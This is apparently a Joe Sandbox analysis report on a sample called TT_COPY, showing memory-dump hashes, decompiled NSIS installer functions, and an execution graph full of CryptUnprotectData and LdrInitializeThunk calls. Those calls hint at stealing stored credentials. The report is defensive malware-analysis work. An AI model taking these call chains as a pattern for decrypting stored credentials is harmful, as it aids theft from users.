                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nshF836.tmp$C:\Users\user\AppData\Local\Temp\nshF836.tmp\System.dll
                                                                                                                            • API String ID: 1659193697-738344614
                                                                                                                            • Opcode ID: efbeaf1aded5b84db90701020331344885af5dfdc72af07c5090307d9f212baa
                                                                                                                            • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                            • Opcode Fuzzy Hash: efbeaf1aded5b84db90701020331344885af5dfdc72af07c5090307d9f212baa
                                                                                                                            • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00403019(intOrPtr _a4) {
                                                                                                                            				long _t2;
                                                                                                                            				struct HWND__* _t3;
                                                                                                                            				struct HWND__* _t6;
                                                                                                                            
                                                                                                                            				if(_a4 == 0) {
                                                                                                                            					if( *0x42aa20 == 0) {
                                                                                                                            						_t2 = GetTickCount();
                                                                                                                            						if(_t2 >  *0x434f0c) {
                                                                                                                            							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                                                                                            							 *0x42aa20 = _t3;
                                                                                                                            							return ShowWindow(_t3, 5);
                                                                                                                            						}
                                                                                                                            						return _t2;
                                                                                                                            					} else {
                                                                                                                            						return E00406946(0);
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					_t6 =  *0x42aa20;
                                                                                                                            					if(_t6 != 0) {
                                                                                                                            						_t6 = DestroyWindow(_t6);
                                                                                                                            					}
                                                                                                                            					 *0x42aa20 = 0;
                                                                                                                            					return _t6;
                                                                                                                            				}
                                                                                                                            			}






                                                                                                                            0x00403020
                                                                                                                            0x00403040
                                                                                                                            0x0040304a
                                                                                                                            0x00403056
                                                                                                                            0x00403067
                                                                                                                            0x00403070
                                                                                                                            0x00000000
                                                                                                                            0x00403075
                                                                                                                            0x0040307c
                                                                                                                            0x00403042
                                                                                                                            0x00403049
                                                                                                                            0x00403049
                                                                                                                            0x00403022
                                                                                                                            0x00403022
                                                                                                                            0x00403029
                                                                                                                            0x0040302c
                                                                                                                            0x0040302c
                                                                                                                            0x00403032
                                                                                                                            0x00403039
                                                                                                                            0x00403039

                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                            • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102729457-0
                                                                                                                            • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                            • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                            • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                            • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                            				int _t15;
                                                                                                                            				long _t16;
                                                                                                                            
                                                                                                                            				_t15 = _a8;
                                                                                                                            				if(_t15 != 0x102) {
                                                                                                                            					if(_t15 != 0x200) {
                                                                                                                            						_t16 = _a16;
                                                                                                                            						L7:
                                                                                                                            						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                                                                            							_push(_t16);
                                                                                                                            							_push(6);
                                                                                                                            							 *0x42d254 = _t16;
                                                                                                                            							E00404ED4();
                                                                                                                            						}
                                                                                                                            						L11:
                                                                                                                            						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                                                                            					}
                                                                                                                            					if(IsWindowVisible(_a4) == 0) {
                                                                                                                            						L10:
                                                                                                                            						_t16 = _a16;
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					_t16 = E00404E54(_a4, 1);
                                                                                                                            					_t15 = 0x419;
                                                                                                                            					goto L7;
                                                                                                                            				}
                                                                                                                            				if(_a12 != 0x20) {
                                                                                                                            					goto L10;
                                                                                                                            				}
                                                                                                                            				E004044E5(0x413);
                                                                                                                            				return 0;
                                                                                                                            			}





                                                                                                                            0x00405517
                                                                                                                            0x00405521
                                                                                                                            0x0040553d
                                                                                                                            0x0040555f
                                                                                                                            0x00405562
                                                                                                                            0x00405568
                                                                                                                            0x00405572
                                                                                                                            0x00405573
                                                                                                                            0x00405575
                                                                                                                            0x0040557b
                                                                                                                            0x0040557b
                                                                                                                            0x00405585
                                                                                                                            0x00000000
                                                                                                                            0x00405593
                                                                                                                            0x0040554a
                                                                                                                            0x00405582
                                                                                                                            0x00405582
                                                                                                                            0x00000000
                                                                                                                            0x00405582
                                                                                                                            0x00405556
                                                                                                                            0x00405558
                                                                                                                            0x00000000
                                                                                                                            0x00405558
                                                                                                                            0x00405527
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040552e
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                              • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                            • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                            • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                            • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                            • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00403B57() {
                                                                                                                            				void* _t2;
                                                                                                                            				void* _t3;
                                                                                                                            				void* _t6;
                                                                                                                            				void* _t8;
                                                                                                                            
                                                                                                                            				_t8 =  *0x42b22c;
                                                                                                                            				_t3 = E00403B3C(_t2, 0);
                                                                                                                            				if(_t8 != 0) {
                                                                                                                            					do {
                                                                                                                            						_t6 = _t8;
                                                                                                                            						_t8 =  *_t8;
                                                                                                                            						FreeLibrary( *(_t6 + 8));
                                                                                                                            						_t3 = GlobalFree(_t6);
                                                                                                                            					} while (_t8 != 0);
                                                                                                                            				}
                                                                                                                            				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                                                                            				return _t3;
                                                                                                                            			}







                                                                                                                            0x00403b58
                                                                                                                            0x00403b60
                                                                                                                            0x00403b67
                                                                                                                            0x00403b6a
                                                                                                                            0x00403b6a
                                                                                                                            0x00403b6c
                                                                                                                            0x00403b71
                                                                                                                            0x00403b78
                                                                                                                            0x00403b7e
                                                                                                                            0x00403b82
                                                                                                                            0x00403b83
                                                                                                                            0x00403b8b

                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(?,75DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 1100898210-3355392842
                                                                                                                            • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                            • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                            • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                            • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                            				int _v8;
                                                                                                                            				int _t12;
                                                                                                                            				int _t14;
                                                                                                                            				int _t15;
                                                                                                                            				CHAR* _t17;
                                                                                                                            				CHAR* _t27;
                                                                                                                            
                                                                                                                            				_t12 = lstrlenA(_a8);
                                                                                                                            				_t27 = _a4;
                                                                                                                            				_v8 = _t12;
                                                                                                                            				while(lstrlenA(_t27) >= _v8) {
                                                                                                                            					_t14 = _v8;
                                                                                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                            					if(_t15 == 0) {
                                                                                                                            						_t17 = _t27;
                                                                                                                            					} else {
                                                                                                                            						_t27 = CharNextA(_t27);
                                                                                                                            						continue;
                                                                                                                            					}
                                                                                                                            					L5:
                                                                                                                            					return _t17;
                                                                                                                            				}
                                                                                                                            				_t17 = 0;
                                                                                                                            				goto L5;
                                                                                                                            			}









                                                                                                                            0x00405fa2
                                                                                                                            0x00405fa4
                                                                                                                            0x00405fa7
                                                                                                                            0x00405fd3
                                                                                                                            0x00405fac
                                                                                                                            0x00405fb5
                                                                                                                            0x00405fba
                                                                                                                            0x00405fc5
                                                                                                                            0x00405fc8
                                                                                                                            0x00405fe4
                                                                                                                            0x00405fca
                                                                                                                            0x00405fd1
                                                                                                                            0x00000000
                                                                                                                            0x00405fd1
                                                                                                                            0x00405fdd
                                                                                                                            0x00405fe1
                                                                                                                            0x00405fe1
                                                                                                                            0x00405fdb
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190613189-0
                                                                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                            • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                            • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:23.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:99.4%
                                                                                                                            Signature Coverage:2.1%
                                                                                                                            Total number of Nodes:339
                                                                                                                            Total number of Limit Nodes:26
                                                                                                                            execution_graph 38199 1d510c50 38200 1d510c5d 38199->38200 38201 1d510c6f 38200->38201 38203 1d51ce2f 38200->38203 38204 1d51ce58 38203->38204 38209 1d51d4e0 38204->38209 38214 1d51d4d0 38204->38214 38219 1d51d5e0 38204->38219 38205 1d51cecb 38205->38201 38211 1d51d4e9 38209->38211 38210 1d51d5d9 38210->38205 38211->38210 38225 1d51d711 38211->38225 38248 1d51d720 38211->38248 38216 1d51d4e9 38214->38216 38215 1d51d5d9 38215->38205 38216->38215 38217 1d51d711 13 API calls 38216->38217 38218 1d51d720 13 API calls 38216->38218 38217->38216 38218->38216 38220 1d51d5ee 38219->38220 38222 1d51d4e9 38219->38222 38221 1d51d5d9 38221->38205 38222->38221 38223 1d51d711 13 API calls 38222->38223 38224 1d51d720 13 API calls 38222->38224 38223->38222 38224->38222 38226 1d51d73f 38225->38226 38227 1d51d767 38226->38227 38271 1d51e706 38226->38271 38280 1d51e980 38226->38280 38287 1d51e499 38226->38287 38299 1d51e56e 38226->38299 38308 1d51e763 38226->38308 38315 1d51e4e0 38226->38315 38324 1d51e8fb 38226->38324 38331 1d51e678 38226->38331 38340 1d51e478 38226->38340 38361 1d51e876 38226->38361 38368 1d51e5f3 38226->38368 38377 1d51e7f1 38226->38377 38384 1d51e942 38226->38384 38391 1d51e82f 38226->38391 38398 1d51e7aa 38226->38398 38405 1d51e527 38226->38405 38414 1d51e6bf 38226->38414 38423 1d51e8b4 38226->38423 38430 1d51e5b5 38226->38430 38439 1d51e631 38226->38439 38249 1d51d73f 38248->38249 38250 1d51d767 38249->38250 38251 1d51e942 LdrInitializeThunk 38249->38251 38252 1d51e7f1 LdrInitializeThunk 38249->38252 38253 1d51e5f3 2 API calls 38249->38253 38254 1d51e876 LdrInitializeThunk 38249->38254 38255 1d51e478 3 API calls 38249->38255 38256 1d51e678 2 API calls 38249->38256 38257 1d51e8fb LdrInitializeThunk 38249->38257 38258 1d51e4e0 2 API calls 38249->38258 38259 1d51e763 LdrInitializeThunk 38249->38259 38260 1d51e56e 2 API calls 38249->38260 38261 1d51e499 3 API calls 38249->38261 38262 1d51e980 LdrInitializeThunk 38249->38262 38263 1d51e706 2 API calls 38249->38263 38264 1d51e631 2 API calls 38249->38264 38265 1d51e5b5 2 API calls 38249->38265 38266 1d51e8b4 LdrInitializeThunk 38249->38266 38267 1d51e6bf 2 API calls 38249->38267 38268 1d51e527 2 API calls 38249->38268 38269 1d51e7aa LdrInitializeThunk 38249->38269 38270 1d51e82f LdrInitializeThunk 38249->38270 38251->38250 38252->38250 38253->38250 38254->38250 38255->38250 38256->38250 38257->38250 38258->38250 38259->38250 38260->38250 38261->38250 38262->38250 38263->38250 38264->38250 38265->38250 38266->38250 38267->38250 38268->38250 38269->38250 38270->38250 38272 1d51e718 KiUserExceptionDispatcher 38271->38272 38274 1d51e748 38272->38274 38448 2054f395 38274->38448 38452 2054f0a8 38274->38452 38456 2054f048 38274->38456 38461 2054f341 38274->38461 38275 1d51e9ac 38275->38227 38281 1d51e992 38280->38281 38283 2054f395 LdrInitializeThunk 38281->38283 38284 2054f341 LdrInitializeThunk 38281->38284 38285 2054f048 LdrInitializeThunk 38281->38285 38286 2054f0a8 LdrInitializeThunk 38281->38286 38282 1d51e9ac 38282->38227 38283->38282 38284->38282 38285->38282 38286->38282 38288 1d51e4ab 38287->38288 38471 cac598 38288->38471 38475 cac5a8 38288->38475 38289 1d51e4c5 38290 1d51e72c KiUserExceptionDispatcher 38289->38290 38291 1d51e748 38290->38291 38295 2054f395 LdrInitializeThunk 38291->38295 38296 2054f341 LdrInitializeThunk 38291->38296 38297 2054f048 LdrInitializeThunk 38291->38297 38298 2054f0a8 LdrInitializeThunk 38291->38298 38292 1d51e9ac 38292->38227 38295->38292 38296->38292 38297->38292 38298->38292 38300 1d51e580 38299->38300 38301 1d51e72c KiUserExceptionDispatcher 38300->38301 38302 1d51e748 38301->38302 38304 2054f395 LdrInitializeThunk 38302->38304 38305 2054f341 LdrInitializeThunk 38302->38305 38306 2054f048 LdrInitializeThunk 38302->38306 38307 2054f0a8 LdrInitializeThunk 38302->38307 38303 1d51e9ac 38303->38227 38304->38303 38305->38303 38306->38303 38307->38303 38309 1d51e775 38308->38309 38311 2054f395 LdrInitializeThunk 38309->38311 38312 2054f341 LdrInitializeThunk 38309->38312 38313 2054f048 LdrInitializeThunk 38309->38313 38314 2054f0a8 LdrInitializeThunk 38309->38314 38310 1d51e9ac 38310->38227 38311->38310 38312->38310 38313->38310 38314->38310 38316 1d51e4f2 38315->38316 38317 1d51e72c KiUserExceptionDispatcher 38316->38317 38318 1d51e748 38317->38318 38320 2054f395 LdrInitializeThunk 38318->38320 38321 2054f341 LdrInitializeThunk 38318->38321 38322 2054f048 LdrInitializeThunk 38318->38322 38323 2054f0a8 LdrInitializeThunk 38318->38323 38319 1d51e9ac 38319->38227 38320->38319 38321->38319 38322->38319 38323->38319 38325 1d51e90d 38324->38325 38327 2054f395 LdrInitializeThunk 38325->38327 38328 2054f341 LdrInitializeThunk 38325->38328 38329 2054f048 LdrInitializeThunk 38325->38329 38330 2054f0a8 LdrInitializeThunk 38325->38330 38326 1d51e9ac 38326->38227 38327->38326 38328->38326 38329->38326 38330->38326 38332 1d51e68a 38331->38332 38333 1d51e72c KiUserExceptionDispatcher 38332->38333 38334 1d51e748 38333->38334 38336 2054f395 LdrInitializeThunk 38334->38336 38337 2054f341 LdrInitializeThunk 38334->38337 38338 2054f048 LdrInitializeThunk 38334->38338 38339 2054f0a8 LdrInitializeThunk 38334->38339 38335 1d51e9ac 38335->38227 38336->38335 38337->38335 38338->38335 38339->38335 38350 cab738 CryptUnprotectData 38340->38350 38351 caba58 CryptUnprotectData 38340->38351 38352 cab9f0 CryptUnprotectData 38340->38352 38355 cab7d6 CryptUnprotectData 38340->38355 38356 cab737 CryptUnprotectData 38340->38356 38357 cab714 CryptUnprotectData 38340->38357 38358 cab645 CryptUnprotectData 38340->38358 38574 cabcc0 38340->38574 38578 cabc10 38340->38578 38341 1d51e47e 38359 cac598 CryptUnprotectData 38341->38359 38360 cac5a8 CryptUnprotectData 38341->38360 38342 1d51e4c5 38343 1d51e72c KiUserExceptionDispatcher 38342->38343 38344 1d51e748 38343->38344 38346 2054f395 LdrInitializeThunk 38344->38346 38347 2054f341 LdrInitializeThunk 38344->38347 38348 2054f048 LdrInitializeThunk 38344->38348 38349 2054f0a8 LdrInitializeThunk 38344->38349 38345 1d51e9ac 38345->38227 38346->38345 38347->38345 38348->38345 38349->38345 38350->38341 38351->38341 38352->38341 38355->38341 38356->38341 38357->38341 38358->38341 38359->38342 38360->38342 38362 1d51e888 38361->38362 38364 2054f395 LdrInitializeThunk 38362->38364 38365 2054f341 LdrInitializeThunk 38362->38365 38366 2054f048 LdrInitializeThunk 38362->38366 38367 2054f0a8 LdrInitializeThunk 38362->38367 38363 1d51e9ac 38363->38227 38364->38363 38365->38363 38366->38363 38367->38363 38369 1d51e605 38368->38369 38370 1d51e72c KiUserExceptionDispatcher 38369->38370 38371 1d51e748 38370->38371 38373 2054f395 LdrInitializeThunk 38371->38373 38374 2054f341 LdrInitializeThunk 38371->38374 38375 2054f048 LdrInitializeThunk 38371->38375 38376 2054f0a8 LdrInitializeThunk 38371->38376 38372 1d51e9ac 38372->38227 38373->38372 38374->38372 38375->38372 38376->38372 38378 1d51e803 38377->38378 38380 2054f395 LdrInitializeThunk 38378->38380 38381 2054f341 LdrInitializeThunk 38378->38381 38382 2054f048 LdrInitializeThunk 38378->38382 38383 2054f0a8 LdrInitializeThunk 38378->38383 38379 1d51e9ac 38379->38227 38380->38379 38381->38379 38382->38379 38383->38379 38385 1d51e954 38384->38385 38387 2054f395 LdrInitializeThunk 38385->38387 38388 2054f341 LdrInitializeThunk 38385->38388 38389 2054f048 LdrInitializeThunk 38385->38389 38390 2054f0a8 LdrInitializeThunk 38385->38390 38386 1d51e9ac 38386->38227 38387->38386 38388->38386 38389->38386 38390->38386 38392 1d51e841 38391->38392 38394 2054f395 LdrInitializeThunk 38392->38394 38395 2054f341 LdrInitializeThunk 38392->38395 38396 2054f048 LdrInitializeThunk 38392->38396 38397 2054f0a8 LdrInitializeThunk 38392->38397 38393 1d51e9ac 38393->38227 38394->38393 38395->38393 38396->38393 38397->38393 38399 1d51e7bc 38398->38399 38401 2054f395 LdrInitializeThunk 38399->38401 38402 2054f341 LdrInitializeThunk 38399->38402 38403 2054f048 LdrInitializeThunk 38399->38403 38404 2054f0a8 LdrInitializeThunk 38399->38404 38400 1d51e9ac 38400->38227 38401->38400 38402->38400 38403->38400 38404->38400 38406 1d51e539 38405->38406 38407 1d51e72c KiUserExceptionDispatcher 38406->38407 38408 1d51e748 38407->38408 38410 2054f395 LdrInitializeThunk 38408->38410 38411 2054f341 LdrInitializeThunk 38408->38411 38412 2054f048 LdrInitializeThunk 38408->38412 38413 2054f0a8 LdrInitializeThunk 38408->38413 38409 1d51e9ac 38409->38227 38410->38409 38411->38409 38412->38409 38413->38409 38415 1d51e6d1 38414->38415 38416 1d51e72c KiUserExceptionDispatcher 38415->38416 38417 1d51e748 38416->38417 38419 2054f395 LdrInitializeThunk 38417->38419 38420 2054f341 LdrInitializeThunk 38417->38420 38421 2054f048 LdrInitializeThunk 38417->38421 38422 2054f0a8 LdrInitializeThunk 38417->38422 38418 1d51e9ac 38418->38227 38419->38418 38420->38418 38421->38418 38422->38418 38424 1d51e8c6 38423->38424 38426 2054f395 LdrInitializeThunk 38424->38426 38427 2054f341 LdrInitializeThunk 38424->38427 38428 2054f048 LdrInitializeThunk 38424->38428 38429 2054f0a8 LdrInitializeThunk 38424->38429 38425 1d51e9ac 38425->38227 38426->38425 38427->38425 38428->38425 38429->38425 38431 1d51e5c7 38430->38431 38432 1d51e72c KiUserExceptionDispatcher 38431->38432 38433 1d51e748 38432->38433 38435 2054f395 LdrInitializeThunk 38433->38435 38436 2054f341 LdrInitializeThunk 38433->38436 38437 2054f048 LdrInitializeThunk 38433->38437 38438 2054f0a8 LdrInitializeThunk 38433->38438 38434 1d51e9ac 38434->38227 38435->38434 38436->38434 38437->38434 38438->38434 38440 1d51e643 38439->38440 38441 1d51e72c KiUserExceptionDispatcher 38440->38441 38442 1d51e748 38441->38442 38444 2054f395 LdrInitializeThunk 38442->38444 38445 2054f341 LdrInitializeThunk 38442->38445 38446 2054f048 LdrInitializeThunk 38442->38446 38447 2054f0a8 LdrInitializeThunk 38442->38447 38443 1d51e9ac 38443->38227 38444->38443 38445->38443 38446->38443 38447->38443 38451 2054f1ea 38448->38451 38449 2054f363 38451->38449 38465 2054d918 38451->38465 38455 2054f0c6 38452->38455 38453 2054f363 38454 2054d918 LdrInitializeThunk 